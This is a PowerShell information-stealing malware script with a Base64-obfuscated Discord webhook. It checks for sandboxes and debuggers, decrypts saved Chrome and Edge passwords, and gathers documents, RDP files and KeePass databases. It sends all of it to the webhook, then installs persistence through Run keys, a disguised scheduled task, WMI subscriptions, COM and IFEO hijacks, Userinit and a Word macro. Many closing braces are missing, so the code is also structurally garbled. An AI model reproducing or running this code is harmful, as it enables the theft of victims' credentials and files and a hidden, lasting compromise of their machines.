# --- CONFIG (Base64
$WEBHOOK = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTM1NDkyNDU2MjkxMDgxMDExMi81OGM4WkVxQTV5SkQ4ZnN6RGJlZzJtYmg0cmJpVFJtZ0N0STQ0Rzc4czczSmQ4a2NyT2lqQ3hMbjZ3MFgtaC1EMlgxSA"))
$PERSIST = $true
$MAX_FILE_SIZE = 10MB # 10MB max for Discord uploads
# ---
function Test-SafeEnvironment {
# Simple sandbox checks
if ($env:UserName -match "^(sandbox|malware|analysis)$") { exit }
if ((Get-WmiObject Win32_ComputerSystem).Model -match "Virtual|VMware|VBox") { exit }
if ((Get-WmiObject Win32_BIOS).SerialNumber -match "VMware|Virtual") { exit }
if ([System.Diagnostics.Debugger]::IsAttached) { exit }
# Check for recent file creation (common in sandboxes)
$recentFiles = Get-ChildItem $env:USERPROFILE -Recurse -File |
Where-Object { $_.CreationTime -gt (Get-Date).AddMinutes(-30) }
if ($recentFiles.Count -gt 100) { exit }
# ---
function Get-BrowserCredentials {
$results = @()
# Chrome & Edge paths
$browserPaths = @(
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data",
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
foreach ($path in $browserPaths) {
try {
$tempCopy = "$env:TEMP\browser_$([System.IO.Path]::GetRandomFileName()).db"
Copy-Item $path -Destination $tempCopy -Force
# SQLite connection
Add-Type -Path "System.Data.SQLite"
$conn = New-Object System.Data.SQLite.SQLiteConnection
$conn.ConnectionString = "Data Source=$tempCopy"
$conn.Open()
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT origin_url, username_value, password_value FROM logins"
$reader = $cmd.ExecuteReader()
while ($reader.Read()) {
$encrypted = $reader.GetValue(2)
$plain = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encrypted,
$null,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser
)
$results += "URL: $($reader[0])`nUser: $($reader[1])`nPass: $([Text.Encoding]::UTF8.GetString($plain))`n"
}
$conn.Close()
Remove-Item $tempCopy -Force
}
catch { continue }
return $results -join "`n`n"
# ---
function Find-InterestingFiles {
$paths = @(
"$env:USERPROFILE\Documents",
"$env:USERPROFILE\Desktop",
"$env:USERPROFILE\Downloads",
"\\Network\Shares" # Add network paths if available
$files = foreach ($path in $paths) {
Get-ChildItem -Path $path -Include *.pdf, *.doc*, *.xls*, *.rdp, *.kdbx -Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Length -lt $MAX_FILE_SIZE } |
Select-Object -First 5
return $files | Sort-Object LastWriteTime -Descending | Select-Object -First 10
# ---
function Send-DiscordMessage {
param(
[string]$Message,
[string]$FilePath = $null
$boundary = [System.Guid]::NewGuid().ToString()
$body = New-Object System.Text.StringBuilder
$body.AppendLine("--$boundary")
$body.AppendLine("Content-Disposition: form-data; name=`"content`"")
$body.AppendLine()
$body.AppendLine($Message)
if ($FilePath) {
$fileBytes = [System.IO.File]::ReadAllBytes($FilePath)
$fileName = (Get-Item $FilePath).Name
$body.AppendLine("--$boundary")
$body.AppendLine("Content-Disposition: form-data; name=`"file`"; filename=`"$fileName`"")
$body.AppendLine("Content-Type: application/octet-stream")
$body.AppendLine()
$body.AppendLine([Convert]::ToBase64String($fileBytes))
$body.AppendLine("--$boundary--")
try {
Invoke-RestMethod -Uri $WEBHOOK -Method Post `
-ContentType "multipart/form-data; boundary=$boundary" `
-Body $body.ToString()
return $true
catch { return $false }
# ---
function Install-Persistence {
if (-not $PERSIST) { return }
# Registry Run Key
$regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
$payload = "powershell -Ep Bypass -W Hidden -File `"$PSCommandPath`""
Set-ItemProperty -Path $regPath -Name "WindowsUpdate" -Value $payload -Force
# Scheduled Task
$action = New-ScheduledTaskAction -Execute "powershell.exe" `
-Argument "-Ep Bypass -W Hidden -File `"$PSCommandPath`""
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "MicrosoftEdgeUpdate" `
-Action $action -Trigger $trigger -Force | Out-Null
1. WMI
2. COM
4. IFEO
function Add-WmiPersistence {
# Persistent WMI event that survives reboots
$filterName = "WindowsUpdateDrivers_" + (Get-Random -Minimum 1000 -Maximum 9999)
$consumerName = "WindowsUpdateEater_" + (Get-Random -Minimum 1000 -Maximum 9999)
$eventFilter = @{
EventNamespace = 'root\subscription'
Name = $filterName
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
QueryLanguage = 'WQL'
$eventConsumer = @{
Name = $consumerName
CommandLineTemplate = "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$PSCommandPath`""
$filter = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class '__EventFilter' -Arguments $eventFilter
$consumer = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class 'CommandLineEventConsumer' -Arguments $eventConsumer
$binding = Set-WmiInstance -Namespace $eventFilter.EventNamespace -Class '__FilterToConsumerBinding' -Arguments @{
Filter = $filter
Consumer = $consumer
function Add-ComHijackPersistence {
# Hijack MMC snap-in load behavior
$payload = "powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
$regPath = "HKCU:\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32"
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "(Default)" -Value $payload -Force
Set-ItemProperty -Path $regPath -Name "ThreadingModel" -Value "Apartment" -Force
function Add-ExplorerShellExtension {
# Explorer context menu handler
$regPath = "HKCU:\Software\Classes\*\shell\OpenWithMalware\command"
$payload = "`"powershell.exe`" -WindowStyle Hidden -File `"$PSCommandPath`" `"%1`""
New-Item -Path $regPath -Force | Out-Null
Set-ItemProperty -Path $regPath -Name "(Default)" -Value $payload -Force
function Add-IFEOHijack {
# Image File Execution Options debugger
$targetBinary = "notepad.exe" # Common benign target
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$targetBinary"
$payload = "`"powershell.exe`" -WindowStyle Hidden -File `"$PSCommandPath`""
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue | Out-Null
Set-ItemProperty -Path $regPath -Name "Debugger" -Value $payload -Force
function Add-OfficeAddinPersistence {
# Word startup add-in
$officePath = [Environment]::GetFolderPath('ApplicationData') + "\Microsoft\Word\STARTUP\"
$payload = "powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
$vbaCode = @"
Sub AutoOpen()
CreateObject("WScript.Shell").Run "$payload", 0
End Sub
New-Item -Path $officePath -ItemType Directory -Force | Out-Null
$vbaCode | Out-File "$officePath\Normal.dotm" -Force
function Add-UserInitHijack {
# Userinit MPR Logon Script
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
$original = (Get-ItemProperty -Path $regPath -Name Userinit).Userinit
$payload = "$original, powershell.exe -WindowStyle Hidden -File `"$PSCommandPath`""
Set-ItemProperty -Path $regPath -Name "Userinit" -Value $payload -Force
# --- MAIN ---
Test-SafeEnvironment
# Collect data
$creds = Get-BrowserCredentials
$files = Find-InterestingFiles
# Create report
$report = @"
=== COMPROMISED SYSTEM ===
User: $env:USERNAME
Host: $env:COMPUTERNAME
Domain: $env:USERDOMAIN
=== CREDENTIALS ===
$creds
=== FILES FOUND ===
$($files.FullName -join "`n")
$reportPath = "$env:TEMP\system_report_$(Get-Date -Format 'yyyyMMdd').txt"
$report | Out-File $reportPath
# Exfiltrate
if (Send-DiscordMessage -Message "New infection: $env:COMPUTERNAME" -FilePath $reportPath) {
foreach ($file in $files) {
Send-DiscordMessage -Message "Collected file: $($file.Name)" -FilePath $file.FullName
Install-Persistence
Add-WmiPersistence
Add-UserInitHijack
Add-IFEOHijack
Add-ComHijackPersistence
Add-ExplorerShellExtension
Remove-Item $reportPath -Force